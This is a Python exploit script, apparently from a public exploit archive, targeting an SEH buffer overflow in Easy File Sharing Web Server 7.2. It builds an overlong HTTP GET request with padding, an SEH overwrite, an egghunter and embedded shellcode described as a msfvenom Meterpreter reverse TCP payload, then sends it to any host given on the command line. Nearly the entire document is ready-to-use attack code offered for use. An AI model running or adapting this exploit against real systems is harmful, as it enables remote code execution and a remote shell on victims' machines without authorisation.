Easy File Sharing Web Server 7.2 SEH Buffer Overflow

1. #!/usr/bin/python
2.  
3. # Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter)
4. # Date: 2016/8/31
5. # Exploit Author: Iran Cyber Security Group
6. # Vendor Homepage: http://www.sharing-file.com
7. # Software Link: http://www.sharing-file.com/efssetup.exe
8. # Version: 7.2 [LATEST]
9. # Tested on: Microsoft Windows 7 Professional x86 [Should Work On The Other Operating Systems]
10. # CVE : N/A
11. # Usage : python exploit.py [IP or Domain]
12.  
13. # Discovered By Arash Khazaei (AKA XoDiAK)
14. # Greetz To Iran Cyber Members & My Friends
15.  
16. import sys,socket
17. from struct import pack
18.  
19. HOST = sys.argv[1]
20. PORT = 80
21. # msfvenom -p windows/meterpreter/reverse_tcp -b '\x2f\x5c' -i 2 -f c 335 Byte
22. # Replace It With Your Own Shellcode !
23.  
24. shellcode = ("w00tw00t" + "\xd9\xc9\xbf\x35\xfe\x35\x6e\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
25. "\x4e\x31\x7e\x17\x83\xc6\x04\x03\x4b\xed\xd7\x9b\x6a\xff\xc1"
26. "\x10\xa8\xf4\xa8\xf1\x79\x4b\x8d\xf4\xcf\x36\xbf\xbe\x1e\x4d"
27. "\xd8\x43\x1a\xa9\x5b\x81\x1f\xdd\x18\x78\xb2\x84\x32\xfb\x61"
28. "\x03\x6f\x9e\xe5\x0f\x3d\x70\x9b\xbb\xd1\x2e\x81\x1c\xa6\x79"
29. "\x74\x27\x17\xde\x04\x4b\x10\x89\x6b\xd3\xe4\xc0\x6c\x47\x32"
30. "\xf4\x44\xeb\x7e\x1e\xd7\x62\x4c\x56\x0f\x58\x2e\x1a\x12\xc9"
31. "\x0e\x12\x81\x30\xc9\x30\x3c\x76\xc0\x7a\xc0\xe0\x3b\xba\x6f"
32. "\xfc\x5b\xe3\x3f\x1c\xa6\x37\x3d\xf5\x6b\xf3\x1a\xe0\x82\x85"
33. "\xc8\xee\xce\xc8\xa2\xf9\x0e\x84\xe3\xac\x36\xe6\x3b\xc0\xe7"
34. "\x61\xc1\xd3\xef\xf1\x4e\xc3\xde\xfd\xc7\x77\x5b\x51\xbc\xab"
35. "\x2d\xb9\x65\x03\xc1\x01\x47\xbe\x50\xe2\xfc\x96\x96\xab\xd3"
36. "\xf8\x53\x15\x69\xc6\xcd\x34\xdb\xd3\xcd\xcc\xdd\x02\x24\x31"
37. "\x9f\xc0\xce\x41\x53\xf0\xe0\xb1\xd7\x96\xfc\x16\xe4\x10\xba"
38. "\xd0\xd0\x10\x02\x40\xdc\x33\x9d\xb5\x35\xbb\x3f\x4f\x93\x11"
39. "\x9a\x16\x63\x1b\x60\xa1\xab\x5e\x05\xf2\x7c\x02\x57\x99\x90"
40. "\x88\x4d\xcf\x60\x3a\x9f\x77\x8a\x9e\xff\x1c\x91\x61\xec\x5e"
41. "\xd4\x08\x54\x76\xfb\xdb\x45\xda\x8f\x01\xba\xed\x01\xef\x09"
42. "\xc1\x5d\x8f\x2b\x24\x69\xc0\xbf\x44\x03\x6e\x62\x7c\x39\x6a"
43. "\xab\x18\x70\xe5\xff\xe6\x33\x3b\x2b\x37\xf1\xb3\x92\xd6\x59"
44. "\xcc\xc8\xca\x8d\x9d\x34\xf9\x89\xf7\x26\xbc\x60\xa1\xdf\xcb"
45. "\xa8\x9d\xd2\x9f\x33\x5a\x48\xb2\x8d\xc5\xaa\x9f\x3c\x37\x0b"
46. "\x98\x35\x70\x3b\xe0")
47.  
48.  
49. # Padding !
50. junk = "A" * 4061
51. # Next SEH
52. nseh = "\xeb\x06\x90\x90"
53.  
54. # 0x1000108b [ImageLoader.dll] POP POP RET
55. seh = pack('<L', 0x10018848)
56.  
57. # Egg Hunter 32 Byte Tag = w00tw00t
58. egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
59. "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
60.  
61. exploit = junk + nseh + seh + egghunter + shellcode + "\x90"*(len(junk)-4-4-32-8-335-5000)
62. try:
63. s = socket.socket()
64. s.connect((HOST, PORT))
65. s.send("GET " + exploit + " HTTP/1.0\r\n\r\n")
66. s.close()
67. except:
68. print "Can't Connect To Web Server ! Is it up ?"
69. print "Evil Buffer Sended Successfully!"